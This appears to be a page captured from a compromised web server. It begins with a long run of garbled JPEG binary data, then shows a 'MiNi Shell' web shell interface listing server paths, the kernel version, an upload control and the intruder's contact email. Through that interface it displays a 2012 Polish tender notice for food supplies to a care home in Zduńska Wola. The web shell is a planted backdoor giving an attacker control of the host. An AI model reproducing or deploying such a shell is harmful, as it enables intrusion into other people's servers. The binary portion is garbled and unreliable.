JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120119/17704-N-2012.html

<p class="kh_header"><b>Zduńska Wola: Dostawa i zakup artykułów spożywczych w Domu Pomocy Społecznej w Zduńskiej Woli, ul. Łaska 42</b><br>
<b>Numer ogłoszenia: 17704 - 2012; data zamieszczenia: 19.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Zduńskiej Woli , ul. Łaska 42, 98-220 Zduńska Wola, woj. łódzkie, tel. 0-43 8232570, faks 0-43 8232570.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa jednostka organizacyjna pomocy społecznej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i zakup artykułów spożywczych w Domu Pomocy Społecznej w Zduńskiej Woli, ul. Łaska 42.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zakup artykułów spożywczych w Domu Pomocy Społecznej w Zduńskiej Woli, ul. Łaska 42.
2.	Pracownik zajmujący się zaopatrzeniem zamawia telefonicznie określone ilości artykułów spożywczych.
3.	Dostawca dowozi zamówiony towar do siedziby zamawiającego swoim środkiem transportu najpóźniej w dniu następnym w godzinach pracy magazyniera                               tj. 7.00-15.00.
4.	Płatność za zakupiony towar następuje przelewem po otrzymaniu faktury w terminie 14 dni.
5.	Wybór dostawcy nastąpi po zapoznaniu się z dokumentacją przetargową oferentów.
W wyborze oferenta istotną będzie cena na nw. towary.
Lp.	Asortyment	           Jednostka miary	Ilość 	Przewidywany okres zakupu
1.	Budyń 64g	                            kg	           72	               12 m-cy
2.	Brzoskwinie w puszcze 820g	    kg        	   98          	- // -
3.	Cukier 1kg	                            kg	        3300            	- // -
4.	Cukier puder 500g                    kg  	   17          	- // -
5.	Cukier waniliowy 16g	            kg      	  2,5	                - // -
6.	Cynamon 15g	                    kg	             1          	- // -
7.	Chrzan 270g	                    kg	           21	                - // -
8.	Drożdże 100g	                    kg        	   50           	- // -
9.	Dżem niskosłodzony (wiśniowy,
 czarna porzeczka, truskawka ,
 brzoskwinia) 270 g	                    kg	          255          	- // -
10.	Groszek konserwowy 240g	    kg	            91          	- // -
11.	Gałka muszkatołowa 15g	    kg	           0,5          	- // -
12.	Herbata czarna sypana 
 liściasta 100g	                            kg	            66	                - // -
13.	Herbata owocowa ekspresowa
 20 saszetek = opakowanie	           op.	          130	                - // -
14.	Ketchup bez konserwantów
  380g	                                   kg	            99                 - // -
15.	Kukurydza konserwowa 240g	   kg	            26	                - // -
16.	Kawa zbożowa 150g	           kg	           4,5          	- // -
17.	Galaretka owocowa  70 g	   kg	            13         	- // -
18.	Koncentrat pomidorowy  
 30%  230g                                    kg	           100          	- // -
19.	Kakao 200g                            kg	             14	        - // -
20.	Kwasek cytrynowy	           kg	              3          	- // -
21.	Kasza jęczmienna średnia 1kg    kg	           120         	- // -
22.	Kasza gryczana w saszetkach 
400g	                                           kg	           152           	- // -
23.	Kasza manna  typu 480 1kg	   kg	           220         	- // -
24.	Kleik ryżowy 400g                   kg	             20	        - // -
25.	Liść laurowy 7g	                   kg	              2	                - // -
26.	Konserwa rybna w pomidorach
 lub oleju 185g	                           kg	             78	        - // -
27.	Musztarda 180g	                   kg	             45	        - // -
28.	Majeranek 7g	                   kg	            4,5	        - // -
29.	Miód naturalny 270g	           kg	             21	        - // -
30.	Margaryna do smarowania
 pieczywa  60% tłuszczu 500g	   kg	          1280	        - // -
31.	Margaryna do smażenia  
60% tłuszczu 200g	                   kg	            300	        - // -
32.	Margaryna do pieczenia 
75% tłuszczu  200g	                   kg	             50	        - // -
33.	Mąka pszenna  typ 480  1kg	   kg	          2000	        - // -
34.	Mąka ziemniaczana 1kg	           kg	             50	        - // -
35.	Makaron nitki do rosołu  
5 jajeczny  1kg	                           kg	           625          	- // -
36.	Majonez - zawartość minimalna
 tłuszczu 60%  270g	                   kg	           140          	- // -
37.	Mięta ekspresowa 
20 saszetek = opakowanie	          op.	             50	        - // -
38.	Ocet 0,5l	                            l	             15	        - // -
39.	Olej słonecznikowy   1l	            l	          1000	        - // -
40.	Ogórki konserwowe 800g	  kg	            210	        - // -
41.	Pasztet drobiowy 
w puszce 160g	                          kg	            290	        - // -
42.	Proszek do pieczenia 20g	  kg	             1,5	        - // -
43.	Papryka konserwowa 800g	  kg	              72	        - // -
44.	Papryka mielona słodka 20g	  kg	             2,5	        - // -
45.	Pieprz czarny mielony 20g	  kg	           14,5	        - // -
46.	Płatki kukurydziane 250g	  kg	              20	        - // -
47.	Płatki owsiane 0,5 kg	          kg	            120	        - // -
48.	Przyprawa warzywna
 do potraw  250g	                          kg	            146	        - // -
49.	Ryż biały długoziarnisty 1kg	  kg	            250	        - // -
50.	Ryż w saszetkach 400g        	  kg	            176	        - // -
51.	Rodzynki 100g	                  kg	             15	        - // -
52.	Sól 1kg	                          kg	           450	                - // -
53.	Syrop owocowy (malinowy,
 wiśniowy) 0,33l	                            l	             50	        - // -
54.	Szczaw konserwowy 270g	  kg	             20	        - // -
55.	Soda oczyszczona 30g	          kg	              1         	- // -
56.	Ziele angielskie 15 g	          kg	            1,5	        - // -
57.	Makaron ( świderki,
 nitka  średnia) 1kg	                  kg	           625           	- // -
58.	Konserwa - tuńczyk 
w kawałkach w oleju
 roślinnym 185 g	                          kg	             50	        - // -.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.40.00.00-2, 15.60.00.00-4, 15.80.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie                  do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawionego                 nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiatzdunskowolski.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej, ul. Łaska 42, 98-220 Zduńska Wola.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.01.2012 godzina 10:00, miejsce: Dom Pomocy Społecznej, ul. Łaska 42, 98-220 Zduńska Wola, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 20 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com